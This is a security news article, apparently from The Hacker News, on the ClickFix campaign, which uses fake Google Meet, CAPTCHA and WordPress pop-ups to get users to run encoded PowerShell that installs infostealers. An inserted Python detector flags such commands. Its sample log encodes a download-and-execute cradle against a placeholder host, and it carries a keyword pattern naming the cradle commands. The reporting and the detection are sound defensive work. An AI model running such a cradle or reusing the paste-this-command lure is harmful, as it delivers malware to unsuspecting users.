Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.
"This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in a report shared with The Hacker News.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) campaign have been reported widely in recent months, with threat actors employing different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run encoded PowerShell code to address a supposed issue with displaying content in the web browser.
These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet as well as potentially Zoom.
On Windows, the attack chain culminates in the deployment of StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file ("Launcher_v1.94.dmg") that drops another stealer known as Atomic.
This emerging social engineering tactic is notable because it sidesteps detection by security tools: the user manually runs the malicious PowerShell command in a terminal, rather than a downloaded payload invoking it automatically.
Sekoia has attributed the cluster impersonating Google Meet to two traffers groups, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove, respectively.
"Both traffers teams [...] use the same ClickFix template that impersonates Google Meet," Sekoia said. "This discovery suggests that these teams share materials, also known as 'landing project,' as well as infrastructure."
This, in turn, has raised the possibility that both threat groups are making use of the same, as-yet-unknown cybercrime service, with a third party likely managing their infrastructure.
The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
"The rise of open-source infostealers represents a significant shift in the world of cyber threats," cybersecurity company Hudson Rock noted back in July 2024.
"By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals."
ClickFix Delivers Lumma Stealer; Targets WordPress Sites
Cybersecurity company Qualys has detailed a new ClickFix campaign that leverages CAPTCHA-verification lures on fake websites to trick users into copying and executing a Base64-encoded PowerShell script using the Run dialog box in Windows.
The PowerShell script is configured to retrieve a remote payload, which, in turn, executes another PowerShell script to download and run Lumma Stealer by means of a technique known as process hollowing to evade detection.
"The investigation into Lumma Stealer reveals an evolving threat landscape characterized by the malware's ability to adapt and evade detection," Qualys researcher Vishwajeet Kumar said. "It employs a variety of tactics, from leveraging legitimate software to utilizing deceptive delivery methods, making it a persistent challenge for security teams."
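The Run-dialog delivery described above leaves a distinctive process lineage: PowerShell started by the Windows shell with a Base64 -EncodedCommand. The following detector is an added example, not code from the article or any vendor it cites; the pipe-delimited record format, the sample records, and the cradle keyword list are constructed assumptions for the demonstration.

```python
# Added example (not from the article or any vendor cited): flag process-creation records
# matching the ClickFix pattern: PowerShell launched from the Windows shell (the Run dialog)
# with a Base64 -EncodedCommand that decodes to a download-and-run cradle. Constructed demo data.
import base64
import re

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE = re.compile(r"\b(?:iex|iwr|invoke-expression|invoke-webrequest|downloadstring)\b", re.I)

def encode_for_powershell(script: str) -> str:
    """UTF-16LE Base64, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> "str | None":
    """Decoded -EncodedCommand script, or None if absent or not valid Base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def is_clickfix_like(parent_image: str, image: str, cmdline: str) -> bool:
    """PowerShell whose parent is explorer.exe (the Run dialog's host process) and whose
    encoded command contains a cradle that fetches and executes remote content."""
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return False
    if not parent_image.lower().endswith("explorer.exe"):
        return False
    decoded = decode_encoded_command(cmdline)
    return decoded is not None and CRADLE.search(decoded) is not None

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [  # constructed records: parent_image|image|command_line
    # Run-dialog paste of an encoded cradle: should be flagged
    r"C:\Windows\explorer.exe|" + PS + "|powershell.exe -enc "
    + encode_for_powershell("iex (iwr 'http://example.invalid/x')"),
    # encoded but harmless one-liner from the Run dialog: not flagged
    r"C:\Windows\explorer.exe|" + PS + "|powershell.exe -enc " + encode_for_powershell("Get-Date"),
    # same cradle but launched by a management agent, not the shell: outside this rule
    r"C:\Program Files\Mgmt\agent.exe|" + PS + "|powershell.exe -enc "
    + encode_for_powershell("iex (iwr 'http://example.invalid/x')"),
]

def scan_log(records: list) -> list:
    """Decoded scripts of every record that matches the ClickFix pattern."""
    return [decode_encoded_command(c) for p, i, c in (r.split("|", 2) for r in records)
            if is_clickfix_like(p, i, c)]
```

Decoding the encoded command before matching is what makes the rule useful; matching the raw Base64 string would miss every re-encoded variant.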
GoDaddy and its Sucuri subsidiary have also warned that these ClickFix campaigns are targeting WordPress sites using malicious plugins (e.g., Advanced User Manager, Quick Cache Cleaner, and universal-popup-plugin-v133) to deliver deceptive browser fix popup messages.
"The popup instructs the user to 'install the root certificate' by clicking on a fake button labeled How to Fix," security researcher Puja Srivastava said. "Upon clicking this button, a new pop-up appears with detailed instructions for running malicious commands on PowerShell."
"Users who unknowingly execute this PowerShell script end up downloading and running a trojan, which can have severe consequences, such as data theft, remote control of the machine, and/or further exploitation."
More than 6,000 WordPress sites are estimated to have been infected in this manner to date, with the threat actors leveraging stolen admin credentials to install the rogue plugins. There is evidence to suggest that some level of automation is involved in creating the plugins, owing to the consistency in naming conventions and metadata.
It isn't currently clear how the WordPress admin credentials are obtained in the first place, but potential vectors include brute-force attacks, phishing, and information stealer campaigns aimed at acquiring usernames and passwords.
"Once installed, the plugins inject malicious JavaScript containing a known variation of fake browser update malware that uses blockchain and smart contracts to obtain malicious payloads," Denis Sinegubko said. "When executed in the browser, JavaScript presents users with fake browser update notifications that guide them to install malware on their computer."
Fake CAPTCHA Checks Lead to Lumma and Amadey Trojan
Cybersecurity company Kaspersky has revealed that web pages hosting fake CAPTCHA checks are being used to propagate Lumma Stealer and Amadey, an information stealer that can also deliver next-stage payloads like Remcos RAT, as part of a new ClickFix campaign.
"From September 22 to October 14, 2024, [...] over 20,000 users were redirected to infected sites, where some of them saw a fake update notification or a fake CAPTCHA," it said in a report published on October 29, 2024. "Users in Brazil, Spain, Italy, and Russia were most frequently affected."
ClickFix's Widespread Adoption
Sekoia, in a follow-up report released on November 5, 2024, said that multiple intrusion sets have adopted the ClickFix technique to distribute malware through email phishing campaigns, compromised websites, and distribution infrastructures. This includes the Russia-linked APT28 actor, which has employed the method to drop PowerShell malware to harvest data in attacks targeting Ukraine.
(The story has been updated after publication to include additional information shared by several cybersecurity vendors about the ClickFix campaigns.)